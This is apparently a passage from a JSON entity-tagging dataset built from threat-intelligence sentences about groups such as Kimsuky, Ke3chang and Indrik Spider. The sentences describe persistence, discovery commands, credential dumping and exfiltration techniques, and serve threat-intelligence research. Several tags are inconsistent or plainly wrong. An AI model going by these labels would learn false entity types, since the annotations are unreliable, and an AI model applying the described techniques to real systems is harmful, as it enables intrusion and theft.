"Inception", "used", "chains", "of", "compromised", "routers", "to", "proxy", "C2", "communications", "between", "them", "and", "cloud", "service", "providers." ], "ner_tags": [ "B-Idus", "O", "O", "O", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "I-Org", "I-Org", "O" ] }, { "tokens": [ "Inception", "has", "used", "PowerShell", "to", "execute", "malicious", "commands", "and", "payloads." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Inception", "has", "used", "a", "reconnaissance", "module", "to", "identify", "active", "processes", "and", "other", "associated", "loaded", "modules." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Inception", "has", "maintained", "persistence", "by", "modifying", "Registry", "run", "key", "value", "<code>HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\</code>." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "Inception", "has", "ensured", "persistence", "at", "system", "boot", "by", "setting", "the", "value", "<code>regsvr32", "%path%\\ctfmonrn.dll", "/s</code>." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "B-SamFile", "B-SamFile", "B-SamFile" ] }, { "tokens": [ "Inception", "has", "enumerated", "installed", "software", "on", "compromised", "systems." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Inception", "has", "used", "weaponized", "documents", "attached", "to", "spearphishing", "emails", "for", "reconnaissance", "and", "initial", "compromise." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-Way", "I-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Inception", "has", "encrypted", "network", "communications", "with", "AES." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Inception", "has", "used", "a", "reconnaissance", "module", "to", "gather", "information", "about", "the", "operating", "system", "and", "hardware", "on", "the", "infected", "host." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "I-Purp", "I-Purp", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Inception", "has", "used", "decoy", "documents", "to", "load", "malicious", "remote", "payloads", "via", "HTTP." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Inception", "has", "obtained", "and", "used", "open-source", "tools", "such", "as", "LaZagne." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Inception", "has", "used", "VBScript", "to", "execute", "malicious", "commands", "and", "payloads." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Inception", "has", "used", "HTTP,", "HTTPS,", "and", "WebDav", "in", "network", "communications." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "B-Way", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Inception", "has", "incorporated", "at", "least", "five", "different", "cloud", "service", "providers", "into", "their", "C2", "infrastructure", "including", "CloudMe." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "I-Org", "I-Org", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "IndigoZebra", "has", "established", "domains,", "some", "of", "which", "were", "designed", "to", "look", "like", "official", "government", "domains,", "for", "their", "operations." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Idus", "O", "O", "O", "O" ] }, { "tokens": [ "IndigoZebra", "has", "compromised", "legitimate", "email", "accounts", "to", "use", "in", "their", "spearphishing", "operations." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "IndigoZebra", "has", "downloaded", "additional", "files", "and", "tools", "from", "its", "C2", "server." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "IndigoZebra", "sent", "spearphishing", "emails", "containing", "malicious", "attachments", "that", "urged", "recipients", "to", "review", "modifications", "in", "the", "file", "which", "would", "trigger", "the", "attack." ], "ner_tags": [ "B-Idus", "O", "B-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "IndigoZebra", "sent", "spearphishing", "emails", "containing", "malicious", "password-protected", "RAR", "attachments." ], "ner_tags": [ "B-Idus", "O", "B-Way", "I-Way", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "IndigoZebra", "has", "acquired", "open", "source", "tools", "such", "as", "NBTscan", "and", "Meterpreter", "for", "their", "operations." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "IndigoZebra", "created", "Dropbox", "accounts", "for", "their", "operations." ], "ner_tags": [ "B-Idus", "O", "B-Way", "B-Tool", "O", "O", "O" ] }, { "tokens": [ "Indrik", "Spider", "has", "used", "Cobalt", "Strike", "to", "empty", "log", "files." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "Indrik", "Spider", "used", "<code>wmic.exe</code>", "to", "add", "a", "new", "user", "to", "the", "system." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Indrik", "Spider", "has", "encrypted", "domain-controlled", "systems", "using", "BitPaymer." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Indrik", "Spider", "used", "PsExec", "to", "leverage", "Windows", "Defender", "to", "disable", "scanning", "of", "all", "downloaded", "files", "and", "to", "restrict", "real-time", "monitoring." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Indrik", "Spider", "has", "collected", "credentials", "from", "infected", "systems,", "including", "domain", "accounts." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "B-Purp", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Indrik", "Spider", "has", "created", "email", "accounts", "to", "communicate", "with", "their", "ransomware", "victims,", "to", "include", "providing", "payment", "and", "decryption", "details." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Indrik", "Spider", "has", "used", "Group", "Policy", "Objects", "to", "deploy", "batch", "scripts." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "Indrik", "Spider", "has", "downloaded", "additional", "scripts,", "malware,", "and", "tools", "onto", "a", "compromised", "host." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Indrik", "Spider", "has", "used", "malicious", "JavaScript", "files", "for", "several", "components", "of", "their", "attack." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "B-OffAct" ] }, { "tokens": [ "Indrik", "Spider", "used", "Cobalt", "Strike", "to", "carry", "out", "credential", "dumping", "using", "ProcDump." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Indrik", "Spider", "has", "stored", "collected", "date", "in", "a", ".tmp", "file." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "Indrik", "Spider", "has", "attempted", "to", "get", "users", "to", "click", "on", "a", "malicious", "zipped", "file." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Indrik", "Spider", "has", "developed", "malware", "for", "their", "operations,", "including", "ransomware", "such", "as", "BitPaymer", "and", "WastedLocker." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "B-Way", "O", "B-Way" ] }, { "tokens": [ "Indrik", "Spider", "used", "fake", "updates", "for", "FlashPlayer", "plugin", "and", "Google", "Chrome", "as", "initial", "infection", "vectors." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "I-Tool", "I-Tool", "O", "B-Way", "B-Tool", "O", "I-Tool", "I-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "Indrik", "Spider", "has", "used", "PowerShell", "Empire", "for", "execution", "of", "malware." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Indrik", "Spider", "has", "used", "PowerView", "to", "enumerate", "all", "Windows", "Server,", "Windows", "Server", "2003,", "and", "Windows", "7", "instances", "in", "the", "Active", "Directory", "database." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Indrik", "Spider", "has", "served", "fake", "updates", "via", "legitimate", "websites", "that", "have", "been", "compromised." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Indrik", "Spider", "has", "used", "PsExec", "to", "stop", "services", "prior", "to", "the", "execution", "of", "ransomware." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Indrik", "Spider", "has", "used", "the", "win32_service", "WMI", "class", "to", "retrieve", "a", "list", "of", "services", "from", "the", "system." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "B-SamFile", "B-SecTeam", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Indrik", "Spider", "has", "used", "batch", "scripts", "on", "victim's", "machines." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "I-Tool", "I-Tool", "O", "O", "O" ] }, { "tokens": [ "Indrik", "Spider", "has", "used", "WMIC", "to", "execute", "commands", "on", "remote", "computers." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "Ke3chang", "group", "has", "been", "known", "to", "compress", "data", "before", "exfiltration." ], "ner_tags": [ "O", "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ke3chang", "is", "known", "to", "use", "7Zip", "and", "RAR", "with", "passwords", "to", "encrypt", "data", "prior", "to", "exfiltration." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ke3chang", "has", "performed", "frequent", "and", "scheduled", "data", "collection", "from", "victim", "networks." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ke3chang", "has", "performed", "frequent", "and", "scheduled", "data", "exfiltration", "from", "compromised", "networks." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "I-Purp", "I-Purp", "O", "O", "O" ] }, { "tokens": [ "Ke3chang", "has", "used", "compromised", "credentials", "to", "sign", "into", "victims’", "Microsoft", "365", "accounts." ], "ner_tags": [ "B-Idus", "O", "I-Way", "I-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Malware", "used", "by", "Ke3chang", "can", "run", "commands", "on", "the", "command-line", "interface." ], "ner_tags": [ "B-Way", "O", "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ke3chang", "malware", "RoyalDNS", "has", "used", "DNS", "for", "C2." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "Ke3chang", "gathered", "information", "and", "files", "from", "local", "directories", "for", "exfiltration." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ke3chang", "has", "deobfuscated", "Base64-encoded", "shellcode", "strings", "prior", "to", "loading", "them." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ke3chang", "performs", "account", "discovery", "using", "commands", "such", "as", "<code>net", "localgroup", "administrators</code>", "and", "<code>net", "group", "\"REDACTED\"", "/domain</code>", "on", "specific", "permissions", "groups." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ke3chang", "performs", "discovery", "of", "permission", "groups", "<code>net", "group", "/domain</code>." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ke3chang", "transferred", "compressed", "and", "encrypted", "RAR", "files", "containing", "exfiltration", "through", "the", "established", "backdoor", "command", "and", "control", "channel", "during", "operations." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ke3chang", "has", "compromised", "networks", "by", "exploiting", "Internet-facing", "applications,", "including", "vulnerable", "Microsoft", "Exchange", "and", "SharePoint", "servers." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ke3chang", "has", "gained", "access", "through", "VPNs", "including", "with", "compromised", "accounts", "and", "stolen", "VPN", "certificates." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "B-Tool", "O", "I-Tool", "I-Tool", "O" ] }, { "tokens": [ "Ke3chang", "uses", "command-line", "interaction", "to", "search", "files", "and", "directories." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ke3chang", "has", "used", "Mimikatz", "to", "generate", "Kerberos", "golden", "tickets." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ke3chang", "has", "used", "tools", "to", "download", "files", "to", "compromised", "machines." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ke3chang", "has", "used", "keyloggers." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way" ] }, { "tokens": [ "Ke3chang", "has", "dumped", "credentials,", "including", "by", "using", "gsecdump." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Ke3chang", "has", "dumped", "credentials,", "including", "by", "using", "Mimikatz." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Ke3chang", "performs", "account", "discovery", "using", "commands", "such", "as", "<code>net", "localgroup", "administrators</code>", "and", "<code>net", "group", "\"REDACTED\"", "/domain</code>", "on", "specific", "permissions", "groups." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ke3chang", "has", "developed", "custom", "malware", "that", "allowed", "them", "to", "maintain", "persistence", "on", "victim", "networks." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "I-Purp", "I-Purp", "O", "O", "O" ] }, { "tokens": [ "Ke3chang", "has", "dropped", "their", "malware", "into", "legitimate", "installed", "software", "paths", "including:", "`C:\\ProgramFiles\\Realtek\\Audio\\HDA\\AERTSr.exe`,", "`C:\\Program", "Files", "(x86)\\Foxit", "Software\\Foxit", "Reader\\FoxitRdr64.exe`,", "`C:\\Program", "Files", "(x86)\\Adobe\\Flash", "Player\\AddIns\\airappinstaller\\airappinstall.exe`,", "and", "`C:\\Program", "Files", "(x86)\\Adobe\\Acrobat", "Reader", "DC\\Reader\\AcroRd64.exe`." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ke3chang", "has", "used", "NTDSDump", "and", "other", "password", "dumping", "tools", "to", "gather", "credentials." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "B-Tool", "O", "O", "I-Purp", "O" ] }, { "tokens": [ "Ke3chang", "has", "used", "Base64-encoded", "shellcode", "strings." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ke3chang", "performs", "process", "discovery", "using", "<code>tasklist</code>", "commands." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Several", "Ke3chang", "backdoors", "achieved", "persistence", "by", "adding", "a", "Run", "key." ], "ner_tags": [ "O", "B-Idus", "B-Tool", "O", "O", "O", "B-Way", "O", "I-Way", "O" ] }, { "tokens": [ "Ke3chang", "has", "used", "compromised", "credentials", "and", "a", ".NET", "tool", "to", "dump", "data", "from", "Microsoft", "Exchange", "mailboxes." ], "ner_tags": [ "B-Idus", "O", "O", "B-Tool", "B-Way", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ke3chang", "has", "used", "network", "scanning", "and", "enumeration", "tools,", "including", "Ping." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "B-Tool" ] }, { "tokens": [ "Ke3chang", "has", "used", "the", "right-to-left", "override", "character", "in", "spearphishing", "attachment", "names", "to", "trick", "targets", "into", "executing", ".scr", "and", ".exe", "files." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "B-SamFile", "O" ] }, { "tokens": [ "Ke3chang", "actors", "have", "been", "known", "to", "copy", "files", "to", "the", "network", "shares", "of", "other", "computers", "to", "move", "laterally." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ke3chang", "has", "dumped", "credentials,", "including", "by", "using", "gsecdump." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Ke3chang", "has", "used", "a", "tool", "known", "as", "RemoteExec", "(similar", "to", "PsExec)", "to", "remotely", "execute", "batch", "scripts", "and", "binaries." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ke3chang", "used", "a", "SharePoint", "enumeration", "and", "data", "dumping", "tool", "known", "as", "spwebmember." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "B-Tool", "O", "O", "B-Tool", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Ke3chang", "performs", "operating", "system", "information", "discovery", "using", "<code>systeminfo</code>", "and", "has", "used", "implants", "to", "identify", "the", "system", "language", "and", "computer", "name." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ke3chang", "has", "used", "implants", "to", "collect", "the", "system", "language", "ID", "of", "a", "compromised", "machine." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ke3chang", "has", "performed", "local", "network", "configuration", "discovery", "using", "<code>ipconfig</code>." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ke3chang", "performs", "local", "network", "connection", "discovery", "using", "<code>netstat</code>." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ke3chang", "has", "used", "implants", "capable", "of", "collecting", "the", "signed-in", "username." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Ke3chang", "performs", "service", "discovery", "using", "<code>net", "start</code>", "commands." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ke3chang", "has", "obtained", "and", "used", "tools", "such", "as", "Mimikatz." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Ke3chang", "has", "used", "credential", "dumpers", "or", "stealers", "to", "obtain", "legitimate", "credentials,", "which", "they", "used", "to", "gain", "access", "to", "victim", "accounts." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "I-Purp", "I-Purp", "O", "O", "O", "O", "O", "I-Purp", "I-Purp", "O", "O", "O" ] }, { "tokens": [ "Ke3chang", "malware", "including", "RoyalCli", "and", "BS2005", "have", "communicated", "over", "HTTP", "with", "the", "C2", "server", "through", "Internet", "Explorer", "(IE)", "by", "using", "the", "COM", "interface", "IWebBrowser2." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ke3chang", "has", "used", "batch", "scripts", "in", "its", "malware", "to", "install", "persistence", "mechanisms." ], "ner_tags": [ "B-Idus", "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ke3chang", "backdoor", "RoyalDNS", "established", "persistence", "through", "adding", "a", "service", "called", "<code>Nwsapagent</code>." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kimsuky", "has", "added", "accounts", "to", "specific", "groups", "with", "<code>net", "localgroup</code>." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kimsuky", "has", "used", "modified", "versions", "of", "PHProxy", "to", "examine", "web", "traffic", "between", "the", "victim", "and", "the", "accessed", "website." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "B-Purp", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kimsuky", "has", "used", "RC4", "encryption", "before", "exfil." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kimsuky", "has", "used", "QuickZip", "to", "archive", "stolen", "files", "before", "exfiltration." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kimsuky", "has", "used", "Blogspot", "pages", "for", "C2." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "B-Tool", "O", "O" ] }, { "tokens": [ "Kimsuky", "has", "used", "Google", "Chrome", "browser", "extensions", "to", "infect", "victims", "and", "to", "steal", "passwords", "and", "cookies." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Purp", "I-Purp", "I-Purp", "O" ] }, { "tokens": [ "Kimsuky", "has", "a", "HWP", "document", "stealer", "module", "which", "changes", "the", "default", "program", "association", "in", "the", "registry", "to", "open", "HWP", "documents." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kimsuky", "has", "signed", "files", "with", "the", "name", "EGIS", "CO,.", "Ltd.." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O" ] }, { "tokens": [ "Kimsuky", "has", "used", "tools", "that", "are", "capable", "of", "obtaining", "credentials", "from", "saved", "mail." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "I-Purp", "I-Purp", "O", "O", "O" ] }, { "tokens": [ "Kimsuky", "has", "used", "browser", "extensions", "including", "Google", "Chrome", "to", "steal", "passwords", "and", "cookies", "from", "browsers.", "Kimsuky", "has", "also", "used", "Nirsoft's", "WebBrowserPassView", "tool", "to", "dump", "the", "passwords", "obtained", "from", "victims." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-Tool", "O", "I-Purp", "I-Purp", "O", "O", "O", "O", "B-Idus", "O", "O", "O", "B-Org", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kimsuky", "has", "collected", "Office,", "PDF,", "and", "HWP", "documents", "from", "its", "victims." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Tool", "O", "B-Way", "B-Tool", "O", "O", "O" ] }, { "tokens": [ "Kimsuky", "has", "decoded", "malicious", "VBScripts", "using", "Base64." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kimsuky", "created", "and", "used", "a", "mailing", "toolkit", "to", "use", "in", "spearphishing", "attacks." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "B-Org", "B-OffAct" ] }, { "tokens": [ "Kimsuky", "has", "been", "observed", "disabling", "the", "system", "firewall." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kimsuky", "has", "been", "observed", "turning", "off", "Windows", "Security", "Center", "and", "can", "hide", "the", "AV", "software", "window", "from", "the", "view", "of", "the", "infected", "user." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kimsuky", "has", "registered", "domains", "to", "spoof", "targeted", "organizations", "and", "trusted", "third", "parties." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kimsuky", "has", "compromised", "legitimate", "sites", "and", "used", "them", "to", "distribute", "malware." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kimsuky", "has", "compromised", "email", "accounts", "to", "send", "spearphishing", "e-mails." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "Kimsuky", "has", "created", "email", "accounts", "for", "phishing", "operations." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "Kimsuky", "has", "collected", "valid", "email", "addresses", "that", "were", "subsequently", "used", "in", "spearphishing", "campaigns." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Org", "B-OffAct" ] }, { "tokens": [ "Kimsuky", "has", "set", "auto-forward", "rules", "on", "victim's", "e-mail", "accounts." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "Kimsuky", "has", "collected", "victim", "employee", "name", "information." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kimsuky", "has", "exfiltrated", "data", "over", "its", "C2", "channel." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kimsuky", "has", "exfiltrated", "stolen", "files", "and", "data", "to", "actor-controlled", "Blogspot", "accounts." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kimsuky", "has", "exploited", "various", "vulnerabilities", "for", "initial", "access,", "including", "Microsoft", "Exchange", "vulnerability", "CVE-2020-0688." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features" ] }, { "tokens": [ "Kimsuky", "has", "obtained", "exploit", "code", "for", "various", "CVEs." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kimsuky", "has", "used", "RDP", "to", "establish", "persistence." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Kimsuky", "has", "deleted", "the", "exfiltrated", "data", "on", "disk", "after", "transmission.", "Kimsuky", "has", "also", "used", "an", "instrumentor", "script", "to", "terminate", "browser", "processes", "running", "on", "an", "infected", "system", "and", "then", "delete", "the", "cookie", "files", "on", "disk." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Idus", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kimsuky", "has", "used", "FTP", "to", "download", "additional", "malware", "to", "the", "target", "machine." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Kimsuky", "has", "the", "ability", "to", "enumerate", "all", "files", "and", "directories", "on", "an", "infected", "system." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ 